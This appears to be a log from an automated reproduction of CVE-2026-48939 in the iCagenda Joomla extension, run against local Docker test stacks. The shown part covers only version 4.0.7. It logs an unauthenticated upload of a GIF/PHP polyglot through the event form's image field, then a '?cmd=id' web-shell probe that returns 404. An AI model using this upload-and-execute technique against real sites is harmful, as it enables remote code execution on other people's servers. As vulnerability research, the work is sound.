[INFO] 2026-07-06T15:12:26+00:00 CVE-2026-48939 variant search reproduction starting [INFO] 2026-07-06T15:12:26+00:00 Testing alternate public image-upload field against vulnerable 4.0.7 and fixed 4.0.8 [INFO] 2026-07-06T15:12:26+00:00 Using cache root: /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo [INFO] 2026-07-06T15:12:26+00:00 Docker host IP from worker: 172.20.0.1 [INFO] 2026-07-06T15:12:27+00:00 Reusing cached icagenda-4-0-7-package.zip at /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo/icagenda-4-0-7-package.zip [INFO] 2026-07-06T15:12:27+00:00 Reusing cached icagenda-4-0-8-package.zip at /data/pruva/project-cache/21f75b67-70b1-47d7-9acf-f9f7949378cf/repo/icagenda-4-0-8-package.zip [INFO] 2026-07-06T15:12:27+00:00 ===== Starting vulnerable product stack on port 18239 ===== Network vulnerable_stack_default Creating Network vulnerable_stack_default Created Container vulnerable_stack-db-1 Creating Container vulnerable_stack-db-1 Created Container vulnerable_stack-joomla-1 Creating Container vulnerable_stack-joomla-1 Created Container vulnerable_stack-db-1 Starting Container vulnerable_stack-db-1 Started Container vulnerable_stack-db-1 Waiting Container vulnerable_stack-db-1 Healthy Container vulnerable_stack-joomla-1 Starting Container vulnerable_stack-joomla-1 Started [INFO] 2026-07-06T15:12:48+00:00 Waiting for Joomla vulnerable on http://172.20.0.1:18239/ [INFO] 2026-07-06T15:13:09+00:00 Joomla vulnerable healthcheck passed [INFO] 2026-07-06T15:13:09+00:00 Installing iCagenda package for vulnerable from https://www.joomlic.com/download/icagenda/icagenda-core-4-0-7/package-icagenda-core-4-0-7-zip Install Extension ================= [OK] Extension installed successfully. [INFO] 2026-07-06T15:13:12+00:00 Source/version evidence for vulnerable saved to /data/pruva/runs/a3928cf6-d9aa-49be-a37a-7ca03155f786/bundle/logs/vuln_variant/vulnerable_version.txt [INFO] 2026-07-06T15:13:12+00:00 Configuring public iCagenda submit menu/form for vulnerable mysql: [Warning] Using a password on the command line interface can be insecure. [INFO] 2026-07-06T15:13:13+00:00 vulnerable: public form reached with Itemid=112, catid=1, CSRF=df6ecb1f1ef428a48c846c5e997c9e37 [INFO] 2026-07-06T15:13:13+00:00 vulnerable: submitting unauthenticated event form with image-field GIF/PHP polyglot named pruva-image-field-vulnerable.php index.html 47 bytes pruva-image-field-vulnerable.gif 198 bytes [INFO] 2026-07-06T15:13:13+00:00 vulnerable: requesting would-be preserved PHP image URL http://172.20.0.1:18239/images/icagenda/frontend/images/pruva-image-field-vulnerable.php?cmd=id [INFO] 2026-07-06T15:13:13+00:00 vulnerable: PHP image URL returned HTTP 404 HTTP/1.1 404 Not Found Date: Mon, 06 Jul 2026 15:13:13 GMT Server: Apache/2.4.66 (Debian) X-Powered-By: PHP/8.3.30 Set-Cookie: 439b9e1fd98bde122127f32212af393e=21fa9de8255a643f01aefa39f74bd392; path=/; HttpOnly x-frame-options: SAMEORIGIN referrer-policy: strict-origin-when-cross-origin cross-origin-opener-policy: same-origin Expires: Wed, 17 Aug 2005 00:00:00 GMT Last-Modified: Mon, 06 Jul 2026 15:13:13 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 3991 Content-Type: text/html; charset=utf-8